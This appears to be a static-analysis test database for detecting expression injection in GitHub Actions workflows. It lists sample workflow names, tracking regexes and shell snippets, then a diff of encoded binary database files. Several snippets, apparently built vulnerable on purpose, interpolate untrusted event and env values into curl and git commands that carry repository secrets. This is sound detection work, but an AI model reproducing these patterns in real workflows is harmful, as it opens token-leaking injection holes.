testocto-org/sink-repo/.github/workflows/workflow.ymlinput.config-pathexpression-injectionconfig-path.github/workflows/argus_case_study.yml.github/workflows.github.github/workflows/changed-files.yml.github/workflows/comment_issue.yml.github/workflows/comment_issue_newline.yml.github/workflows/cross1.yml.github/workflows/cross2.yml.github/workflows/cross3.yml.github/workflows/discussion.yml.github/workflows/discussion_comment.yml.github/workflows/gollum.yml.github/workflows/image_link_generator.yml.github/workflows/inter-job.yml.github/workflows/issues.yaml.github/workflows/matrix.yml.github/workflows/no-flow1.yml.github/workflows/no-flow2.yml.github/workflows/pull_request_review.yml.github/workflows/pull_request_review_comment.yml.github/workflows/pull_request_target.yml.github/workflows/push.yml.github/workflows/simple1.yml.github/workflows/simple2.yml.github/workflows/test.yml.github/workflows/workflow_run.ymlaction1/action.ymlaction1action2/action.ymlaction2action.yaml\bsteps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\binputs\.([A-Za-z0-9_-]+)\b\bneeds\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)toJSON\(inputs\.([A-Za-z0-9_-]+)\)fromJSON\(inputs\.([A-Za-z0-9_-]+)\)\bgithub\.event\.inputs\.([A-Za-z0-9_-]+)\btoJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)fromJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)\bjobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\bmatrix\.([A-Za-z0-9_-]+)\btoJSON\(matrix\.([A-Za-z0-9_-]+)\)fromJSON\(matrix\.([A-Za-z0-9_-]+)\)\benv\.([A-Za-z0-9_-]+)\btoJSON\(env\.([A-Za-z0-9_-]+)\)fromJSON\(env\.([A-Za-z0-9_-]+)\)Job: redirectIssueJob: changed_filesJob: echo-chamberJob: echo-chamber2Job: echo-chamber3Job: checkIssueInformationJob: issue_type_PredicterJob: cherry_pickJob: process-image-urlJob: job1Job: job2Job: create-matrixJob: analyzeJob: simple1Job outputs nodeUses StepRun StepRun Step: check-infoRun Step: extract-urlRun Step: curlRun Step: trim-urlRun Step: sinkRun Step: no-stepRun Step: flowRun Step: no-flowRun Step: step1Run Step: step2Uses Step: remove_quotationsUses Step: changed-filesUses Step: regex-matchUses Step: remove_quotesUses Step: sourceUses Step: stepUses Step: set-matrixUses Step: summaryUses Step: step0octo-org/this-repo/.github/workflows/workflow.ymltaintocto-org/summary-repo/.github/workflows/workflow.ymlakhileshns/heroku-deployinput.branchoutput.statusandroid-actions/setup-androidinput.cmdline-tools-versionoutput.ANDROID_COMMANDLINE_TOOLS_VERSIONapple-actions/import-codesign-certsinput.keychain-passwordoutput.keychain-passwordashley-taylor/read-json-property-actioninput.jsonoutput.valueashley-taylor/regex-property-actioninput.replacementinput.valueaszc/change-string-case-actioninput.stringoutput.capitalizedinput.replace-withoutput.uppercaseoutput.lowercaseaws-actions/configure-aws-credentialsinput.aws-access-key-idenv.AWS_ACCESS_KEY_IDsecret.AWS_ACCESS_KEY_IDinput.aws-secret-access-keyenv.AWS_SECRET_ACCESS_KEYsecret.AWS_SECRET_ACCESS_KEYinput.aws-session-tokenenv.AWS_SESSION_TOKENsecret.AWS_SESSION_TOKENbobheadxi/deploymentsinput.envoutput.envbufbuild/buf-breaking-actioninput.buf_tokenenv.BUF_TOKENbufbuild/buf-lint-actioncachix/cachix-actioninput.signingKeyenv.CACHIX_SIGNING_KEYcoursier/cache-actioninput.pathenv.COURSIER_CACHEcrazy-max/ghaction-import-gpginput.fingerprintoutput.fingerprintcsexton/release-asset-actioninput.release-urloutput.urldelaguardo/setup-clojureinput.bootenv.BOOT_VERSIONoutput.replacedgame-ci/unity-test-runnerinput.artifactsPathoutput.artifactsPathgetsentry/action-releaseinput.versionoutput.versioninput.version_prefixgithub/codeql-actioninput.outputoutput.sarif-outputgradle/gradle-build-actioninput.cache-encryption-keyenv.GRADLE_ENCRYPTION_KEYinput.build-scan-terms-of-service-agreeenv.BUILD_SCAN_TERMS_OF_SERVICE_AGREEinput.build-scan-terms-of-service-urlenv.BUILD_SCAN_TERMS_OF_SERVICE_URLhaya14busa/action-condinput.if_trueinput.if_falsehexlet/project-actioninput.mount-pathenv.PWDjsdaniell/create-jsoninput.nameoutput.successfullyinput.dirjwalton/gh-ecr-pushinput.imageoutput.imageUrllarsoner/circleci-artifacts-redirector-actioninput.artifact-pathinput.sourceinput.replacemattdavis0351/actionsinput.image-nameinput.tagmetro-digital/setup-tools-for-waasinput.gcp_sa_keyenv.GCLOUD_PROJECTmishakav/pytest-coverage-commentinput.multiple-filesoutput.summaryReportmymindstorm/setup-emsdkinput.actions-cache-folderenv.EMSDKruby/setup-rubyinput.ruby-versionoutput.ruby-prefixsalsify/action-detect-and-tag-new-versioninput.tag-templateoutput.tagshallwefootball/upload-s3-actioninput.destination_diroutput.object_keyshogo82148/actions-setup-perlinput.working-directoryenv.PERL5LIBsuisei-cn/actions-download-fileinput.filenameoutput.filenametimheuer/base64-to-fileinput.fileNameoutput.filePathinput.fileDirbranchcmdline-tools-versionkeychain-passwordjsonreplacementaws-access-key-idaws-secret-access-keyaws-session-tokenbuf_tokensigningKeyfingerprintrelease-urlbootartifactsPathversionversion_prefixoutputcache-encryption-keybuild-scan-terms-of-service-agreebuild-scan-terms-of-service-urlif_trueif_falsemount-pathdirartifact-pathimage-nametaggcp_sa_keymultiple-filesactions-cache-folderruby-versiontag-templatedestination_dirworking-directoryfilenamefileNamefileDir +echo "Bad Issue Title Format"exit 1echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labelsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labelscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentsecho urldecode ${{env.issue_label}}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g')curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/commentsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENVecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENVecho "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENVgh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }}gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENVgit config user.name "${{env.user_name}}"git fetch --allgit checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}}git cherry-pick -x ${{github.event.after}} --strategy-option theirsgit push -u origin ${{env.auto_branch}}hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}"echo "::set-output name=initial_url::$BODY"echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUTecho "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT"Write-Output "::set-output name=MSG::$ENV{BODY}".*::set-output\s+name=(.*)::.*.*echo\s*"(.*)=.*\s*>>\s*(")?\$GITHUB_OUTPUT.*$BODY$MSG$INITIAL_URL$REDIRECTED_URL${BODY${MSG${INITIAL_URL${REDIRECTED_URL$ENV{BODY$ENV{MSG$ENV{INITIAL_URL$ENV{REDIRECTED_URLoutput.foooutput.all_changed_files_countjob_output]test]matrix]MSG]value]replaced]initial_url]redirected_url]trimmed_url][job_output][matrix][MSG][value][replaced][initial_url][redirected_url][trimmed_url] [job_output] [test] [matrix] [MSG] [value] [replaced] [initial_url] [redirected_url] [trimmed_url]Uses Step: remove_quotations [replaced]Run Step: extract-url [initial_url]Run Step: curl [redirected_url]Run Step: trim-url [trimmed_url]Job outputs node [job_output]Uses Step: step [value]Job outputs node [matrix]Uses Step: summary [value]Uses Step: step0 [value]Run Step: step1 [MSG]Run Step: step2 [test]semmle.labelPotential expression injection, which may be controlled by an external user. \ No newline at end of file diff --git a/db/db-yaml/default/yaml.rel b/db/db-yaml/default/yaml.rel new file mode 100644 index 0000000000000000000000000000000000000000..68a7a887f651d38ec0cd273155e841acc2d28904 GIT binary patch literal 33384 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 TopqiKb15e+`E{fHbItz;K!jeg literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/yaml.rel.checksum b/db/db-yaml/default/yaml.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..de6f34140970bfaacb1acf652a352d65a8f5675c GIT binary patch literal 12 ScmZQzU|?hb0{$OcwgLbJRswPW literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/yaml_locations.rel b/db/db-yaml/default/yaml_locations.rel new file mode 100644 index 0000000000000000000000000000000000000000..f46747ec341818ba278ef400b576bde6966ce296 GIT binary patch literal 11128 